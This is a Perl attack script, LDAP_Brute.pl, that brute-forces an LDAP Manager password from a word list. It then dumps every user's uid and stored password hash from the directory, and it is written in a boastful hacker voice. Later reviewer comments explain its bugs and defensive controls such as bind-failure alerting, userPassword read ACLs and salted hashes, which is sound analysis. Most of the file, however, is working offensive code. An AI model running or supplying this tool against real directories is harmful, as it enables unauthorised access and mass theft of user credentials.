#!/usr/bin/perl
# LDAP_Brute.pl

# lets do something fun like brute force a LDAP Manager password 
# and then Dump all user and passwords from the Database.
# Sound Good ? Ok lets do it.

# by: Victim1
# shouts to all AngryPacketeers !!
# http://angreypacket.com

# recommendation: start the -u (user) argument with something like asmi* (as in Ann Smith) or something;
# be creative, they are only users hahaha.

# Extra Info: This was written and tested on Slackware 8.0 against OpenLDAP.
# This is sorta slow but gets the job done.

# Script entry: clear the terminal, print a banner, parse the command line,
# then load the word list and start the bind loop.
# NOTE(review): the file has no `use strict` / `use warnings`. Every variable
# assigned here ($target, $dn, $base, $user, $dictionary, %args) is a package
# global that the subs below read directly instead of taking parameters.
system("clear");
print "Starting Crack:\n";
print "---------------\n";
# `use` is processed at compile time, so Getopt::Std is loaded before the
# prints above run even though it appears after them.
use Getopt::Std;

# -t, -d, -b, -u and -l each take a value; -? is a plain flag.
getopts("t:d:b:u:l:?", \%args);
# continue with normal crack
# Each required option is copied into a global. The tests are truthiness
# tests, so a missing value (or a false one such as "0") calls Usage(),
# which prints the help text and exits.
if($args{t}) {
    $target = $args{t};
} else {
    Usage();
}
if($args{d}) {
    $dn = $args{d}
} else {
    Usage();
}
if($args{b}) {
    $base = $args{b}
} else {
    Usage();
}
if($args{u}) {
    $user = $args{u};
} else {
    Usage();
}
# $dictionary is assigned but not read anywhere in this file; brutality()
# opens $args{l} directly.
if($args{l}) {
    $dictionary = $args{l};
} else {
    Usage();
}
# Only reached when all five value options were supplied.
if($args{"?"}) {
    Usage();
}

# start
# brutality() fills the global @passwords from the word list. The list is
# then passed to ldap_connect(), which does not read its arguments and
# iterates the same global instead.
brutality();
ldap_connect(@passwords);

# Start Brute Force of LDAP Manager Password.
# should return this: -->
# As this is what we will be expecting for a return...
# jsmith:{SHA}JheluJmppdiUiMJhn9X1raH26fA=:0:0:/jsmith:
# For every candidate in the global @passwords: open a new connection to
# $target, send a simple bind as $dn with that candidate, unbind, print the
# guess, and hand over to get_accounts() for the actual success test.
#
# Parameters: none are read; the caller's argument list is ignored.
#
# NOTE(review): what a directory operator sees from this loop is two
# connections and two bind attempts per candidate (one here, one in
# get_accounts), all for the same DN from one source. With OpenLDAP stats
# logging that is presumably a run of bind results with err=49
# (invalidCredentials); alerting on that rate per DN and per source address,
# and limiting who can reach the LDAP port, are the relevant controls.
sub ldap_connect {
    # The loop variable is the package global $password; get_accounts() and
    # dump_database() read it from there rather than from their arguments.
    foreach $password (@passwords) {
        # Compile-time load; it does not re-run on each iteration.
        use Net::LDAP;
        # The constructor result is not checked, so a failed connection
        # leaves $ldap undefined and the bind call below is a fatal error.
        $ldap = Net::LDAP->new($target);
        # The bind result is discarded: nothing here decides whether the
        # candidate was accepted.
        # NOTE(review): no start_tls call is visible, so unless $target is an
        # ldaps:// URI the candidate presumably crosses the network in clear.
        $ldap->bind ($dn,
                     password => $password
                     );
        $ldap->unbind;
        print "Manager -> Guess: $password\n";
        # Both arguments are ignored by get_accounts(), which uses globals.
        get_accounts($target, $password);
    }
}


# OPEN Dictionary and Brute force LDAP server.
# Read the word list named by -l into the global @passwords, one candidate
# per line with the trailing newline removed. Takes no parameters and
# returns nothing useful; dies if the file cannot be opened.
sub brutality {
    #lets load up dictionary
    # NOTE(review): two-argument open on a bareword handle with the file name
    # interpolated into the mode string, so characters in -l are interpreted
    # by open itself. The die message prints $@ (last eval error) rather than
    # $!, so the operating-system reason for a failed open is not shown.
    open(DICT, "<$args{l}") or die "Cannot open: $args{l} $@\n";
    # List context: the whole file is held in memory at once.
    @passwords = <DICT>;
    close(DICT);
    chomp @passwords;
}    


# Open a second connection to $target, bind as $dn with the current global
# $password, search under $base for (uid=$user), and treat a readable {SHA}
# userPassword value on the first returned entry as proof that the candidate
# was correct. On that outcome it prints the result, calls dump_database()
# and exits the program; otherwise it unbinds and returns 0.
#
# Parameters: none are read; the two values passed by ldap_connect() are
# ignored and the globals $target, $dn, $password, $base, $user are used.
sub get_accounts {
    # lets swipe user accounts and SHA_Base64 Keys.
    use Net::LDAP;
    $ldapc = Net::LDAP->new($target) or die "$@";
    # NOTE(review): Net::LDAP's bind presumably returns a message object even
    # when the server rejects the credentials, in which case this `|| die`
    # never fires; the bind result code is not inspected here - confirm
    # against the Net::LDAP documentation.
    $ldapc->bind($dn, password => $password) || die "$@";
    # $user is interpolated into the filter unescaped, so wildcard and other
    # filter metacharacters given on the command line pass straight through.
    $mesg = $ldapc->search (
                            base => $base,
                            scope => "subtree",
                            filter => "(uid=$user)"
                            );
    # Any non-zero search result code ends the whole script, not only this
    # candidate.
    $mesg->code && die $mesg->error;

        # this is a fucking pain in the ass to break a fucking loop ?? isnt it...
        # $i is never incremented, so both numeric fields in $test are 0.
        $i=0;
        # Both branches below leave the loop on the first entry, so only one
        # entry is ever examined. If the search returns no entries the sub
        # falls through without unbinding $ldapc.
        foreach $entry ($mesg->all_entries) {
                @uid=$entry->get_value('uid');
                @pass=$entry->get_value('userpassword');
                $test = ($uid[0].":".$pass[0].":".$i.":".$i.":/".$uid[0].":");
                # The success test is "userPassword came back starting with
                # {SHA}", i.e. the attribute was readable on this connection.
                # $uid[0] is interpolated into the pattern unescaped.
                # NOTE(review): this is why read access to userPassword is
                # the control that matters: a directory ACL that grants it
                # only for authentication and to the entry itself leaves
                # nothing for this check to match unless the bound identity
                # really is privileged.
                if ($test =~ /$uid[0]:{SHA}/) {
                    print "CRACKED MANAGER PASSWORD !!!! -> $password\n";
                    print "$test\n";
                    sleep 2;
                    print "Dumping Database please Wate\n";
                    dump_database();
                    # $ldapc is not unbound on this path.
                    exit;
                } else {
                    $ldapc->unbind;
                    return 0;
                }
            }
}

# Bind to $target as $dn with the global $password, search the whole subtree
# under $base for every entry that has a uid, and print one passwd-style line
# per entry: uid:userPassword:0:0:/uid:
#
# Takes no parameters; reads the globals $target, $dn, $password and $base.
# Dies if the connection cannot be created or the search returns a non-zero
# result code.
#
# NOTE(review): the printed userPassword values are the stored hashes. The
# sample line in this file's comments shows the {SHA} scheme, which is
# presumably OpenLDAP's unsalted SHA-1, so identical passwords produce
# identical values; salted or stronger schemes and an ACL that denies read
# on userPassword limit what output like this is worth.
sub dump_database {
    $ldap = Net::LDAP->new($target) or die "$@";
    # NOTE(review): the bind result code is not inspected; `|| die` only
    # reacts to a false return value - confirm what Net::LDAP returns here.
    $ldap->bind($dn, password => $password) || die "$@";
    $mesg = $ldap->search (
                           base => $base,
                           scope => "subtree",
                           filter => "(uid=*)"
                           );
    $mesg->code && die $mesg->error;
    
    # $i is never incremented, so the two numeric fields are always 0.
    $i=0;
    foreach $entry ($mesg->all_entries) {
        # Only the first value of each attribute is printed.
        @uid=$entry->get_value('uid');
        @pass=$entry->get_value('userpassword');
        print $uid[0].":".$pass[0].":".
            $i.":".$i.":/".$uid[0].":\n";
    }
    $ldap->unbind;
}

# APP USAGE ----->
##################
# Print the option summary and terminate the program. Never returns.
# NOTE(review): the sample command in the help text passes -d twice and has
# no -l, while the option list above it names -l as the password list; the
# sample line is also split across two lines of the heredoc, so it prints
# with a line break in the middle.
sub Usage {
    print <<USAGE;
  Usage: perl LDAP_Brute.pl [-?] -tdbul
      -t Target
      -d dn -> cn=Manager,o=organization,c=country ( US )
      -b base dn (o=Microsoft,c=US)
      -u User
      -l Password List ( Dictionary )
      -? This Menu
        Sample: perl LDAP_Brute.pl -t 192.168.20.10 -d cn=Manager,o=MicroSoft,c=US -b o=Microsoft,c=US 
-u jsmi* -d /usr/local/lib/Cracklib
          Note: You are on you own if you do something Naughty little wee wee's ~!
USAGE
    # Exit status is the default (0) even when called because of a missing
    # option.
    exit;
}
##################

